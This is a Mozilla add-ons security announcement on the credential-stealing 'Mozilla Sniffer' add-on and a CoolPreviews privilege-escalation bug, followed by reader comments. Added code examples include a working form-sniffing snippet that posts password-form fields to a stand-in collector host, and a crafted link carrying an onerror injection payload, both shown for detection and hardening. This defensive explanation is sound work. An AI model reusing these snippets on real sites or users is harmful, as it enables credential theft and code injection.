Add-on security vulnerability announcement

Jorge Villalobos


One malicious add-on and another add-on with a serious security vulnerability were discovered recently on the Mozilla Add-ons site. Both issues have been dealt with, and the details are described below.

Mozilla Sniffer

Issue

An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website and sends it to a remote server. Upon discovery on July 12th, the add-on was disabled on the site and added to the blocklist, which disables it in every current user’s browser and prompts them to uninstall it.

Impact to users

If a user installs this add-on and submits any form that contains a password field, every field in that form, including the password, is sent to a remote server. Uninstalling the add-on stops this behavior. Anybody who installed this add-on should change, as soon as possible, the password of every site they logged into while it was installed.

Status

Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. All current users should receive an uninstall notification within a day or so. The site this add-on sends data to seems to be down at the moment, so it is unknown if data is still being collected.

Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.
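The last sentence is the practical point: a malware scanner matches known signatures, while the behavior described above (hook form submission, read the password field, send the form off-host) is ordinary browser API use that only stands out when someone reads the code. As an added example, not the Mozilla Sniffer code (the post does not reproduce it) and not an AMO tool, here is a heuristic triage pass of the kind a reviewer might run to decide which scripts to read first. The two sample scripts are constructed for this example; the collector host uses the reserved `.invalid` TLD.

```javascript
// Added example: heuristic triage over extension scripts. Not Mozilla's code,
// not the add-on's code; sample inputs are constructed here. A script is
// flagged "review-first" when it (a) hooks form submission, (b) inspects
// password fields, and (c) has a way to send data off-host. This orders
// manual review; it does not replace it.

const SIGNALS = {
  submitHook: /addEventListener\s*\(\s*["']submit["']/,
  passwordRead: /type\s*===?\s*["']password["']|\[type\s*=\s*["']?password["']?\]|\.password\b/,
  outbound: /XMLHttpRequest|\bfetch\s*\(|sendBeacon|\.open\s*\(\s*["'](?:GET|POST)["']/,
};
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// Returns which signals fire, the external hosts named in the source, and a
// verdict: "review-first" if all signals fire, "look" if any fires, else "low".
function triageScript(name, source) {
  const hits = {};
  for (const [signal, re] of Object.entries(SIGNALS)) hits[signal] = re.test(source);
  const hosts = [...new Set((source.match(URL_RE) || []).map(u => {
    try { return new URL(u).host; } catch { return u; }
  }))];
  const fired = Object.values(hits).filter(Boolean).length;
  const verdict = fired === Object.keys(SIGNALS).length ? "review-first"
                : fired > 0 ? "look" : "low";
  return { name, hits, hosts, verdict };
}

// Constructed sample 1: a harmless toolbar button that opens a help page.
const BENIGN = `
  document.getElementById("help-btn").addEventListener("click", function () {
    window.open("https://help.example/addon");
  });
`;

// Constructed sample 2: the behaviour class the post describes, in a few lines.
// A capture-phase submit listener copies every field of a form that has a
// password field and posts the copy to a collector.
const SNIFFER_LIKE = `
  document.addEventListener("submit", function (e) {
    var form = e.target, fields = {}, hasPw = false;
    for (var i = 0; i < form.elements.length; i++) {
      var el = form.elements[i];
      if (el.type === "password") hasPw = true;
      if (el.name) fields[el.name] = el.value;
    }
    if (!hasPw) return;
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://collector.invalid/drop", true);
    xhr.send(JSON.stringify(fields));
  }, true);
`;

function runTriage() {
  return [triageScript("benign.js", BENIGN), triageScript("suspect.js", SNIFFER_LIKE)];
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of runTriage()) {
    console.log(r.verdict.padEnd(12), r.name, JSON.stringify(r.hosts));
  }
}
```

The signal list is deliberately small and will miss obfuscated or string-built calls; its value is in surfacing the combination (submit hook plus password read plus outbound channel) and the hosts a script talks to, so the reviewer knows where to start reading.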

Credit

This issue was originally reported by Johann-Peter Hartmann.

Note

Having unreviewed add-ons exposed to the public, even with low visibility, has been previously identified as an attack vector for hackers. For this reason, we’re already working on implementing a new security model for addons.mozilla.org that will require all add-ons to be code-reviewed before they are discoverable in the site. Here’s more information about it.

CoolPreviews

Issue

A privilege escalation vulnerability was discovered in version 3.0.1 of the CoolPreviews add-on. The vulnerability can be triggered using a specially crafted hyperlink. If the user hovers the cursor over this link, the preview function executes remote JavaScript code with local chrome privileges, giving the attacking script control over the host computer. Version 3.0.1 and all older versions have been disabled on addons.mozilla.org, and a fixed version was uploaded and reviewed within a day of the developer being notified.

Impact to users

Proof of concept code for this vulnerability was posted on this blog, but no known malicious exploits have been reported so far. If a user has a vulnerable version installed and hovers over a malicious link that targets the add-on, the code in the malicious link runs with local chrome privileges, potentially gaining access to the file system and allowing code download and execution.

All users of CoolPreviews should update to the latest version as soon as possible in order to avoid exposure.
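The bug class here is worth seeing in code: an extension feature that runs in a chrome-privileged document and builds its UI from attributes of a link on an untrusted page. What follows is an added illustration of that pattern and its fix, not the CoolPreviews code (the post does not show it); the functions, the crafted link and the crude `looksExploitable` check are all constructed for this example.

```javascript
// Added illustration of the bug class described above (chrome-privileged
// preview built from untrusted link attributes). Not the CoolPreviews code;
// all names and the crafted link below are constructed for this example.

// Vulnerable pattern: untrusted strings interpolated straight into HTML that a
// privileged document will parse. Whatever the page put in href/title becomes
// markup, and any script it carries runs with chrome privileges.
function buildPreviewUnsafe(link) {
  return `<div class="preview"><a href="${link.href}">${link.title}</a></div>`;
}

// Hardened pattern, part 1: escape every interpolated string.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened pattern, part 2: only http(s) targets may become the preview URL.
// javascript:, data:, chrome:, file: and unparsable values collapse to about:blank.
function safeHref(href) {
  try {
    const u = new URL(href);
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : "about:blank";
  } catch {
    return "about:blank";
  }
}

function buildPreviewSafe(link) {
  return `<div class="preview"><a href="${escapeHtml(safeHref(link.href))}">` +
         `${escapeHtml(link.title)}</a></div>`;
}

// Constructed crafted link: a javascript: target plus an event handler
// smuggled in through the title.
const CRAFTED_LINK = {
  href: "javascript:void(0)",
  title: `<img src=x onerror="alert('chrome')">`,
};

// Crude marker check for the example: a raw <img> tag, a live on* attribute
// (quoted, so the escaped &quot; form does not count), or a non-http(s) href
// other than about:blank survived into the markup.
function looksExploitable(html) {
  return /<img\b|\bonerror="|href="(?!https?:|about:blank")/.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", buildPreviewUnsafe(CRAFTED_LINK));
  console.log("safe:  ", buildPreviewSafe(CRAFTED_LINK));
}
```

Escaping fixes the string-building bug, but the better design for chrome code is not to build HTML strings at all: create elements with DOM APIs and set `textContent` and attributes individually, and render the previewed page itself in a content-privileged frame rather than in the chrome document, so that even a missed escape cannot reach chrome privileges.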

Status

Currently, 177,000 users have a vulnerable version installed. This is less than 25% of the current install base and it will continue to decrease as more users are prompted to update to a new version. Vulnerable versions will also be blocklisted very soon.

Credit

This issue was originally reported by Alice White.

11 responses

  1. Andreas Grech wrote:

    Very interesting.

    I have written about this same concept just a couple of days ago as well: http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html

    In my post, I talk about how an attacker can intercept login details with a Google Chrome extension.

  2. dynamis wrote:

    Mozilla Sniffer should be listed in this page, shouldn’t it?
    https://www.mozilla.com/en-US/blocklist/

  3. Anonymous wrote:

    We prefer our privacy. The people who installed the add-on, did this on their own risk.

  4. Harry Johnston wrote:

    What was the advertised purpose of the Mozilla Sniffer add-on?

  5. Jorge wrote:

    @dynamis: yes, I think it will be added eventually.
    @Harry Johnston: it was advertised as a modified version of the TamperData add-on. And it was.

  6. John wrote:

    Mozilla Sniffer and CoolPreviews are still not listed on the block list that we see. I hope this isn’t the list they use for blocking!

    Also, I have no problem with Mozilla knowing how many downloads there have been but find it curious to know that they can tell us how often addons are being used. Not sure that I like that. What else are they collecting with that?

  7. PFudd wrote:

    I’m hoping that this will encourage the signing of reviewed code, such that the apps available through addons.mozilla.org will finally stop saying “Author not verified” for every single addon. Although, really, it should say ‘Code verified/not verified’ in addition to ‘Author verified/not verified’.

    1. wrote:

      It says right there, below the install button, on the page that the add-on hasn’t been reviewed…

  8. lonic wrote:

    If people like it or it sounds interesting they will install it anyway.
    Just when it’s experimental, or the security warning popups or even “don’t click” buttons, ‘interesting picture of you’, etc…

  9. Rod wrote:

    How does one see whether the add-on has been installed on their computer? Thanks.

  10. Jorge wrote:

    @Rod: the add-on should’ve been disabled by now because it’s blocklisted. You can check if it’s installed by opening the Add-ons Manager. It’s accessible from the main menu, at Tools > Add-ons.